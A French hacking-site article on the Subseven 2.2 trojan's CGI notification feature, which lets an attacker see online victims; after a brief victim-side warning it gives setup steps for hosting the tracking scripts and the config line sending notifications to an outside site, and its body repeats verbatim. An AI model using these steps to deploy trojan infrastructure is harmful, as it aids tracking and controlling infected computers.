Page principale >Hacking / Sécurité
Suite...
Suite...
Suite...
Suite...
Suite...
CGI notify pour Subseven 2.2, comment ca marche ?
Quand votre firewall se met à afficher:"Voulez vous autoriser zdcker.exe à acceder à www.site.com/subseven.cgi?" c'est que vous etes infecté par sub7 . Mais pourquoi accede t il à un site internet plutot qu'une notification classique par mail ou ICQ ?
Le script CGI fournit avec Subseven 2.2 permet d'obtenir online toutes les victimes connectées à l'instant ou l'on consulte la page web.
Pour ce faire, la personne qui vous à infecté à rajoutée une option à subseven:
OnconnectScript:
SendCGINotification http://site.com/subseven.cgi 12345
12345 correspond au code qui protegera l'acces au script cgi.
Bien sur, tout le monde n'est pas capable d'effectuer cette prouesse.
Tout d'abord, il faut bien connaitre internet, et le language html ( à portée de tous maintenant grace aux éditeurs html ) et surtout le langage PERL pour la mise en place des CGI. Mais surtout, il faut avoir un hebergeur acceptant le CGI, et surtout peu regardant sur le contenu de ce site.
Des hébergeurs ,de plus gratuits, sont pourtants disponnibles, donc si l'alerte du firewall vous dirige vers des sites comme viruelave.net ou hypermert.net (mais y'en à d'autre) le risque est grand.
Mais comment font ils ?:
Comme je vous le disais, Subseven est "livré" avec un dossier CGI qui comprend tous les scripts "Clé en Main".
Et dans ce dossier, un fichier readme.txt esplique toute la démarche ( en englais ).
Donc, il faut Uploader tous les fichiers dans le dossier cgi-bin. S'il n'existes pas, crée tout d'abord le dossier cgi-bin.
Comme tout script CGI, la premiere ligne indique ou se situe Perl sur le serveur. Suivant la version Perl de votre hebergeur, il s'agit soit de :
#! /usr/bin/perl
ou:
#! /usr/local/bin/perl
Comme tous script CGI, les fichiers doivent etre Uploader en ASCII.( preferes FTPexpert comme client FTP )
Puis, comme presque tous CGI, Il faut faire un CHMOD 755 à tous les fichiers. Si ça ne marche pas, faire un Chmod 777. En cas d'erreur 500 ou WRAP, modifié la 1ère ligne des scripts (/usr/local.....).
En cas de probleme, l'hebergeur pourra vous renseigné du path de PERL.
Installation:
Le plus dur étant fait, l'installation est à la portée de tous.
Depuis son navigateur préféré, aller sur subseven.cgi.
Renseigner ensuite les infos requisent et cliquer sur Install. Un écran s'affiche comportant des informations tres importantes sur la sécurisation des scripts. Une fois l'installation réalisée, le script setup.cgi est détruit. Donc si ça ne marche pas, il faut reuploader setup.cgi.
Voila, avec toutes ces infos, vous devez etre capable de pister une éventuelle CGI notification depuis votre PC ( qui dans ce cas là n'est plus tout à fait qu' à vous :( ).
Pour ce faire, la personne qui vous à infecté à rajoutée une option à subseven:
OnconnectScript:
SendCGINotification http://site.com/subseven.cgi 12345
12345 correspond au code qui protegera l'acces au script cgi.
Bien sur, tout le monde n'est pas capable d'effectuer cette prouesse.
Tout d'abord, il faut bien connaitre internet, et le language html ( à portée de tous maintenant grace aux éditeurs html ) et surtout le langage PERL pour la mise en place des CGI. Mais surtout, il faut avoir un hebergeur acceptant le CGI, et surtout peu regardant sur le contenu de ce site.
Des hébergeurs ,de plus gratuits, sont pourtants disponnibles, donc si l'alerte du firewall vous dirige vers des sites comme viruelave.net ou hypermert.net (mais y'en à d'autre) le risque est grand.
Mais comment font ils ?:
Comme je vous le disais, Subseven est "livré" avec un dossier CGI qui comprend tous les scripts "Clé en Main".
Et dans ce dossier, un fichier readme.txt esplique toute la démarche ( en englais ).
Donc, il faut Uploader tous les fichiers dans le dossier cgi-bin. S'il n'existes pas, crée tout d'abord le dossier cgi-bin.
Comme tout script CGI, la premiere ligne indique ou se situe Perl sur le serveur. Suivant la version Perl de votre hebergeur, il s'agit soit de :
#! /usr/bin/perl
ou:
#! /usr/local/bin/perl
Comme tous script CGI, les fichiers doivent etre Uploader en ASCII.( preferes FTPexpert comme client FTP )
Puis, comme presque tous CGI, Il faut faire un CHMOD 755 à tous les fichiers. Si ça ne marche pas, faire un Chmod 777. En cas d'erreur 500 ou WRAP, modifié la 1ère ligne des scripts (/usr/local.....).
En cas de probleme, l'hebergeur pourra vous renseigné du path de PERL.
Installation:
Le plus dur étant fait, l'installation est à la portée de tous.
Depuis son navigateur préféré, aller sur subseven.cgi.
Renseigner ensuite les infos requisent et cliquer sur Install. Un écran s'affiche comportant des informations tres importantes sur la sécurisation des scripts. Une fois l'installation réalisée, le script setup.cgi est détruit. Donc si ça ne marche pas, il faut reuploader setup.cgi.
Voila, avec toutes ces infos, vous devez etre capable de pister une éventuelle CGI notification depuis votre PC ( qui dans ce cas là n'est plus tout à fait qu' à vous :( ).
Les + Lus Dans Cette Catégorie
Le Processus d activation de Windows XP mis a nu
Mais quel sont les informations que windows XP envoit à microsoft lors de l'activation du systeme d'exploitation? Quand on connait la politique de la vie privée de redmond, on s'attend au pire....Suite...
Savoir si La RIAA vous en veut
Vous etes un acharné du download sur Kazaa. Votre mule tourne a 110 % et votre disque dur pullule de DivX. Ce que vous ne savez peut etre pas, c'est que vous etes peut etre le prochain sur la liste des poursuites judiciaires de la RIAA.Suite...
le portable Orange SPV vulnerable
Une faille de securité touche le portable Orange SPV ( sound picture video ). Le probleme provient des signatures numériques gerées par un logiciel developpé par ... Microsoft :)Suite...
17 ans et 2000 sites hackes, dont 1 de trop !
DKD, 17 ans et demi, lycéen, a été arrèté chez ses parents à Vélizy-Villacoublay après une enquête de policiers de la criminalité informatique. Après s'etre attaqué au site de la NAVY, c'est le site ..... d'une préfecture qui lui aurait été fatal.Suite...
et de 1 pour office 2003
"Overview of the Office 2003 Critical Update", c'est le nom du premier rejeton d'une grande lignée de bug et patch que s'apprete a connaitre le nouveau Microsoft Office 2003.Suite...
Navigation Rapide
|
Astuces Webmaster Astuces WINDOWS Astuces WINDOWS XP Comment ça marche DVD / Secret Evenements Exploits Hacking / Sécurité | Hardware Jeux Vidéo linux News Script(php,java...) Telephonie/GSM Virus |
